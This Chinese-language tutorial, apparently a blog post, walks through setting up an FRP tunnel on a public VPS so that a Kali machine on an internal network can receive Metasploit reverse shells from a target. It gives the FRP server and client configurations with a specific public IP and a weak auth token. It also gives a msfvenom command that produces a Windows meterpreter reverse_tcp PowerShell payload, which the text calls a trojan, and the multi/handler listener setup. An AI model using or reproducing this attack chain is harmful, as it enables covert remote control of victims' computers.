+Metasploit 实现kali端→服务器→目标机远控
公网服务器设置安全策略
开放自定义tcp入站9999和7000端口
建立FRP隧道并配置端口转发
在公网VPS上部署FRP服务端(FRPS)
FRP服务端运行在你的公网VPS上,它的作用是作为一个流量中转站,等待内网Kali的连接,并将公网上的流量转发给Kali。
下载FRP:SSH登录到VPS,下载FRP压缩包并解压
1 2
| wget https://github.com/fatedier/frp/releases/download/v0.58.0/frp_0.58.0_linux_amd64.tar.gz tar -zxvf frp_0.58.0_linux_amd64.tar.gz
|
1
| cd frp_0.58.0_linux_amd64
|
配置FRP服务端:编辑服务端配置文件 frps.toml
添加以下内容(FRP服务端将在VPS的7000端口上监听,等待内网Kali的连接)
1 2 3 4
| bindPort = 7000
auth.method = "token" auth.token = "123456"
|
启动FRP服务端,开启监听
在内网Kali上部署FRP客户端(FRPC)
FRP客户端运行在你的内网Kali上,它会主动连接VPS上的服务端,并建立一条数据传输隧道。
下载FRP:在Kali上下载相同版本的FRP压缩包并解压
1 2
| wget https://github.com/fatedier/frp/releases/download/v0.58.0/frp_0.58.0_linux_amd64.tar.gz tar -zxvf frp_0.58.0_linux_amd64.tar.gz
|
1
| cd frp_0.58.0_linux_amd64
|
配置FRP客户端:编辑客户端配置文件 frpc.toml
这里需要①告知客户端服务器的地址;②定义一条名为 MSF_reverse 的规则
添加以下内容(①构建隧道 ②验证令牌 ③端口转发9999→6688)
1 2 3 4 5 6 7 8 9 10 11 12
| serverAddr = "154.201.95.239" serverPort = 7000
auth.method = "token" auth.token = "123456"
[[proxies]] name = "MSF_reverse" type = "tcp" localIP = "192.168.129.128" localPort = 6688 remotePort = 9999
|
所有发送到VPS的9999端口的流量,都会通过FRP隧道,被转发到Kali本机的6688端口
启动FRP客户端
如果连接成功,会看到login to server success之类的提示,并且VPS上的服务端窗口也会有相应日志。此时,隧道已建立。
kali配置MSF监听器
生成并投递payload(木马)
1
| msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=154.201.95.239 LPORT=9999 -f psh-reflection >2.ps1
|
启动MSF控制台
1
| use exploit/multi/handler
|
1
| set payload windows/x64/meterpreter/reverse_tcp
|
1
| set lhost 192.168.129.128
|
至此,目标实现。